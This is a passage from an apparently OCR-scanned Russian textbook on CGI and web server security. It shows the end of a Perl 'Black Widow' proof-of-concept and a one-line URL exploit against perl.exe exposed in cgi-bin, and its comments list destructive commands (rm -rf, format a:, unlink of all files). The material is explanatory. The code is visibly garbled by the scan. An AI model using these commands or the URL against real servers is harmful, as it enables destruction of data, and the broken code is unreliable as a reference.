Главная Случайная страница Контакты | Мы поможем в написании вашей работы! | ||
|
print <EOF: Content-Type: text/plain
The WWW Black Widow was here. EOF
# Ну а здесь уже можно написать что угодно - от простого # сообщения
администратору о найденной дырке, до чего-нибудь # типа
и systeiTiC'rm -rf * /*"): ff systemC'tormat a:"); ff
systemC'ls -IR"); # systemC'dir"): # unlink <* *.*
/*>;
print "If I were nasty, you'd bespiderfoodbynow.\n"; print "\n\n\t--the black
widow\n";
_-END__
Если под рукой нет Peri, можно попробовать просто дать команду типа http://www.victim.com/cgi-
bin/perl.exe?&-e+unlink+%3C*%3E.
Аналогичные проблемы возникают при реализации РНР в качестве cgi-скрипта и его размещении в каталоге
Cgi-bin.
Безопасность CGI-приложений
Устанавливая последнюю версию Web-сервера, мы можем быть уверены хотя бы в том, что она не содержит
Очевидных ошибок, опубликованных по всей Сети пару лет тому назад. На появление новых ошибок произво-
Дители реагируют достаточно быстро, а задача администратора сводится
К тому, чтобы быть в курсе происходящего. С CGI-приложениями ситуация несколько иная - на сей раз в роли
Разработчика зачастую выступают владельцы сайтов, которые должны сами заботиться о безопасности
Приложений. Не стоит особо доверять и готовым скриптам, так как огромное количество ошибок
Обнаруживается именно в примерах, поставляемых вместе с Web-серверами, а также во многих популярных
Дата публикования: 2014-11-04; Прочитано: 303 | Нарушение авторского права страницы | Мы поможем в написании вашей работы!